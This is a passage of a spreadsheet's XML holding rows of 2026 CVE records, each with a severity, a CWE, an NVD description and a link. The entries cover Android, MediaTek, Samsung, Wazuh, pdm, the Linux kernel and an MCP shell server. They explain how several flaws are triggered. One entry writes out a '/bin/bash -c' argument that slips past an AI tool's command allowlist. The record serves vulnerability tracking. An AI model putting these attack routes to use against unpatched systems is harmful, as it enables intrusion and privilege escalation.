          <t>HIGH</t>
        </is>
      </c>
      <c r="E1583" s="5" t="inlineStr"/>
      <c r="F1583" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1583" s="5" t="inlineStr"/>
      <c r="H1583" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I1583" s="5" t="inlineStr">
        <is>
          <t>2026-03-02</t>
        </is>
      </c>
      <c r="J1583" s="5" t="inlineStr"/>
      <c r="K1583" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1583" s="5" t="inlineStr">
        <is>
          <t>In onTransact of IDrmManagerService.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0010</t>
        </is>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18994</t>
        </is>
      </c>
      <c r="C1584" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1584" s="5" t="inlineStr"/>
      <c r="F1584" s="5" t="inlineStr"/>
      <c r="G1584" s="5" t="inlineStr"/>
      <c r="H1584" s="5" t="inlineStr"/>
      <c r="I1584" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1584" s="5" t="inlineStr"/>
      <c r="K1584" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L1584" s="5" t="inlineStr">
        <is>
          <t>A potential improper authorization vulnerability was reported in the Lenovo File Manager Android Application, distributed exclusively in the Chinese market, that could allow a local authenticated user to read or modify protected files within the application.</t>
        </is>
      </c>
      <c r="M1584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18994</t>
        </is>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19136</t>
        </is>
      </c>
      <c r="C1585" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1585" s="5" t="inlineStr"/>
      <c r="F1585" s="5" t="inlineStr"/>
      <c r="G1585" s="5" t="inlineStr"/>
      <c r="H1585" s="5" t="inlineStr"/>
      <c r="I1585" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1585" s="5" t="inlineStr"/>
      <c r="K1585" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1585" s="5" t="inlineStr">
        <is>
          <t>A potential command injection vulnerability was reported in the Tianxi AI Agent PC Application, distributed exclusively in the Chinese market, that could allow operating system commands to be executed if a local user opens a specially crafted link that is handled by the application.</t>
        </is>
      </c>
      <c r="M1585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19136</t>
        </is>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19843</t>
        </is>
      </c>
      <c r="C1586" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1586" s="5" t="inlineStr"/>
      <c r="F1586" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1586" s="5" t="inlineStr"/>
      <c r="H1586" s="5" t="inlineStr"/>
      <c r="I1586" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1586" s="5" t="inlineStr"/>
      <c r="K1586" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1586" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389-ds-base. The Cockpit 389 Console's LDAP editor constructs an ldapsearch command by embedding an LDAP entry's distinguished name (DN) into a shell command string without proper escaping. An LDAP user with delegated privileges to create or rename directory entries could craft a malicious DN containing shell metacharacters. When a Cockpit administrator subsequently views the entry in the 389 Console, the embedded shell command executes with root privileges on the directory server host.</t>
        </is>
      </c>
      <c r="M1586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19843</t>
        </is>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20501</t>
        </is>
      </c>
      <c r="C1587" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1587" s="5" t="inlineStr"/>
      <c r="F1587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1587" s="5" t="inlineStr"/>
      <c r="H1587" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="I1587" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1587" s="5" t="inlineStr"/>
      <c r="K1587" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1587" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9197.</t>
        </is>
      </c>
      <c r="M1587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20501</t>
        </is>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20502</t>
        </is>
      </c>
      <c r="C1588" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1588" s="5" t="inlineStr"/>
      <c r="F1588" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1588" s="5" t="inlineStr"/>
      <c r="H1588" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="I1588" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1588" s="5" t="inlineStr"/>
      <c r="K1588" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1588" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9196.</t>
        </is>
      </c>
      <c r="M1588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20502</t>
        </is>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21085</t>
        </is>
      </c>
      <c r="C1589" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1589" s="5" t="inlineStr"/>
      <c r="F1589" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1589" s="5" t="inlineStr"/>
      <c r="H1589" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1589" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1589" s="5" t="inlineStr"/>
      <c r="K1589" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1589" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Keymaster trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M1589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21085</t>
        </is>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21101</t>
        </is>
      </c>
      <c r="C1590" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1590" s="5" t="inlineStr"/>
      <c r="F1590" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1590" s="5" t="inlineStr"/>
      <c r="H1590" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1590" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1590" s="5" t="inlineStr"/>
      <c r="K1590" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1590" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in DualDAR driver prior to SMR Sep-2026 Release 1 allows local privileged attackers to potentially execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="M1590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21101</t>
        </is>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4130</t>
        </is>
      </c>
      <c r="C1591" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1591" s="5" t="inlineStr"/>
      <c r="F1591" s="5" t="inlineStr"/>
      <c r="G1591" s="5" t="inlineStr"/>
      <c r="H1591" s="5" t="inlineStr"/>
      <c r="I1591" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1591" s="5" t="inlineStr"/>
      <c r="K1591" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L1591" s="5" t="inlineStr">
        <is>
          <t>There is a storage of sensitive information in cleartext vulnerability in NI SystemLink. This vulnerability may allow an attacker with local access to obtain sensitive information stored by the system in the clear.  This vulnerability affects NI SystemLink and NI SystemLink Server 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M1591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4130</t>
        </is>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42805</t>
        </is>
      </c>
      <c r="C1592" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1592" s="5" t="inlineStr"/>
      <c r="F1592" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1592" s="5" t="inlineStr"/>
      <c r="H1592" s="5" t="inlineStr"/>
      <c r="I1592" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1592" s="5" t="inlineStr"/>
      <c r="K1592" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1592" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the Bosch Sensortec BHI385 SensorAPI (C library) within the debug message parser function bhi385_parse_debug_message (located in bhi385_parse.c). 
The function parses FIFO events and extracts an 8-bit message length directly from the attacker-controlled event payload (callback_info-&gt;data_ptr[0]) without enforcing bounds checks or clamping the value.
When copying the payload into a fixed-size stack buffer of 17 bytes (uint8_t debug_msg[17]) via memcpy, providing a length byte greater than 16 causes the function to write past the allocated stack boundary. 
This memory corruption can be triggered by a malicious or compromised sensor or bus participant, leading to a firmware crash, Denial of Service (DoS), or potentially the execution of arbitrary code via adjacent stack data corruption.</t>
        </is>
      </c>
      <c r="M1592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42805</t>
        </is>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44901</t>
        </is>
      </c>
      <c r="C1593" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1593" s="5" t="inlineStr"/>
      <c r="F1593" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1593" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1593" s="5" t="inlineStr"/>
      <c r="I1593" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1593" s="5" t="inlineStr"/>
      <c r="K1593" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1593" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, AffectedItemsWazuhResult.merge() in framework/wazuh/core/results.py trusts the sort_casting field in a cluster worker's JSON response. During a distributed API merge, attacker-controlled type names are resolved through Python builtins without an allowlist. A compromised worker can set sort_casting to exec and place Python source in affected_items, causing the master to execute the payload as root when responses from multiple nodes are merged. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M1593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44901</t>
        </is>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47211</t>
        </is>
      </c>
      <c r="C1594" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1594" s="5" t="inlineStr"/>
      <c r="F1594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1594" s="5" t="inlineStr"/>
      <c r="H1594" s="5" t="inlineStr"/>
      <c r="I1594" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1594" s="5" t="inlineStr"/>
      <c r="K1594" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1594" s="5" t="inlineStr">
        <is>
          <t>Ouroboros is a local-first runtime for AI coding agents that records their actions and applies user-defined policies to constrain behavior. In versions prior to 0.39.0, if a user clones a malicious repository and runs Ouroboros commands within that directory, it can lead to arbitrary code execution and potential system takeover. The vulnerability stems from Ouroboros loading the .env file from the current working directory. Execution-affecting environment variables such as OUROBOROS_CLI_PATH, OPENCODE_CLI_PATH, and other backend selectors are accepted directly from this local .env. An attacker can include a malicious script in the repository and point the CLI path variable to it (e.g., OUROBOROS_CLI_PATH=./malicious_script.sh). When the user executes a command like ouroboros init or any command that instantiates the adapter, the malicious script is executed instead of the intended CLI. This issue has been fixed in version 0.39.0.</t>
        </is>
      </c>
      <c r="M1594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47211</t>
        </is>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47764</t>
        </is>
      </c>
      <c r="C1595" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1595" s="5" t="inlineStr"/>
      <c r="F1595" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1595" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1595" s="5" t="inlineStr"/>
      <c r="I1595" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1595" s="5" t="inlineStr"/>
      <c r="K1595" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1595" s="5" t="inlineStr">
        <is>
          <t>pdm is a Python package and dependency manager supporting the latest PEP standards. Versions prior to 2.27.0 are vulnerable to path traversal through write_to_fs. InstallDestination.write_to_fs() in src/pdm/installers/installers.py overrides the base class to add symlink/hardlink support but replaces the safe _path_with_destdir() (which validates via Path.resolve() + is_relative_to()) with a bare os.path.join() that performs no path validation. A malicious wheel with traversal entries can write arbitrary files. This issue has been fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M1595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47764</t>
        </is>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47781</t>
        </is>
      </c>
      <c r="C1596" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1596" s="5" t="inlineStr"/>
      <c r="F1596" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1596" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1596" s="5" t="inlineStr"/>
      <c r="I1596" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1596" s="5" t="inlineStr"/>
      <c r="K1596" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L1596" s="5" t="inlineStr">
        <is>
          <t>PDM is a Python package and dependency manager. In versions up to and including 2.26.9, PDM automatically loads project-local plugins from a .pdm-plugins directory during initialization, allowing an attacker-controlled file in an untrusted repository checkout to execute arbitrary Python code before any command is parsed. This happens because load_plugins() runs during Core.init() and adds .pdm-plugins via site.addsitedir(), which processes .pth files and immediately executes any line beginning with import, so the code runs with the privileges of the user invoking pdm and even a benign command such as pdm --version triggers it (making the impact strongest in CI, automation, and privileged contexts). The issue is fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M1596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47781</t>
        </is>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52491</t>
        </is>
      </c>
      <c r="C1597" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1597" s="5" t="inlineStr"/>
      <c r="F1597" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1597" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H1597" s="5" t="inlineStr"/>
      <c r="I1597" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1597" s="5" t="inlineStr"/>
      <c r="K1597" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1597" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the libtiff/tools/thumbnail.c: main() component</t>
        </is>
      </c>
      <c r="M1597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52491</t>
        </is>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52875</t>
        </is>
      </c>
      <c r="C1598" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1598" s="5" t="inlineStr"/>
      <c r="F1598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1598" s="5" t="inlineStr"/>
      <c r="H1598" s="5" t="inlineStr"/>
      <c r="I1598" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1598" s="5" t="inlineStr"/>
      <c r="K1598" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L1598" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to 2.6.0, the perform-scheduled-backup IPC handler in src/ipc/storage.js takes settings.path from a renderer-supplied object and uses the resulting directory for fs.mkdirSync, fs.writeFileSync, fs.readdirSync, and fs.unlinkSync operations without checking that it is inside an authorized backup location. A compromised renderer can choose an absolute path or a relative traversal path to create directories and write a streambert-backup-[timestamp].json file containing renderer-controlled data. The pruning loop can also delete files in that directory whose names begin with streambert-backup- and end with .json. This vulnerability is fixed in 2.6.0.</t>
        </is>
      </c>
      <c r="M1598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52875</t>
        </is>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53091</t>
        </is>
      </c>
      <c r="C1599" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1599" s="5" t="inlineStr"/>
      <c r="F1599" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1599" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1599" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1599" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J1599" s="5" t="inlineStr"/>
      <c r="K1599" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L1599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: pull headers in qdisc_pkt_len_segs_init()
Most ndo_start_xmit() methods expects headers of gso packets
to be already in skb-&gt;head.
net/core/tso.c users are particularly at risk, because tso_build_hdr()
does a memcpy(hdr, skb-&gt;data, hdr_len);
qdisc_pkt_len_segs_init() already does a dissection of gso packets.
Use pskb_may_pull() instead of skb_header_pointer() to make
sure drivers do not have to reimplement this.
Some malicious packets could be fed, detect them so that we can
drop them sooner with a new SKB_DROP_REASON_SKB_BAD_GSO drop_reason.</t>
        </is>
      </c>
      <c r="M1599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53091</t>
        </is>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54369</t>
        </is>
      </c>
      <c r="C1600" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1600" s="5" t="inlineStr"/>
      <c r="F1600" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1600" s="5" t="inlineStr"/>
      <c r="H1600" s="5" t="inlineStr"/>
      <c r="I1600" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J1600" s="5" t="inlineStr"/>
      <c r="K1600" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1600" s="5" t="inlineStr">
        <is>
          <t>acl before version 2.4.0 contains a symlink traversal vulnerability in the libacl pathname-based functions acl_get_file(), acl_set_file(), acl_extended_file(), and acl_delete_def_file() that allows local attackers to escalate privileges by replacing any pathname component with a symbolic link. Attackers who control any component of a pathname processed by a privileged caller can redirect ACL read or write operations to arbitrary files or directories, enabling unauthorized manipulation of access control lists and local privilege escalation.</t>
        </is>
      </c>
      <c r="M1600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54369</t>
        </is>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54371</t>
        </is>
      </c>
      <c r="C1601" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1601" s="5" t="inlineStr"/>
      <c r="F1601" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1601" s="5" t="inlineStr"/>
      <c r="H1601" s="5" t="inlineStr"/>
      <c r="I1601" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J1601" s="5" t="inlineStr"/>
      <c r="K1601" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1601" s="5" t="inlineStr">
        <is>
          <t>attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.</t>
        </is>
      </c>
      <c r="M1601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54371</t>
        </is>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="C1602" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1602" s="5" t="inlineStr"/>
      <c r="F1602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1602" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1602" s="5" t="inlineStr"/>
      <c r="I1602" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1602" s="5" t="inlineStr"/>
      <c r="K1602" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="L1602" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="C1603" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1603" s="5" t="inlineStr"/>
      <c r="F1603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1603" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1603" s="5" t="inlineStr"/>
      <c r="I1603" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
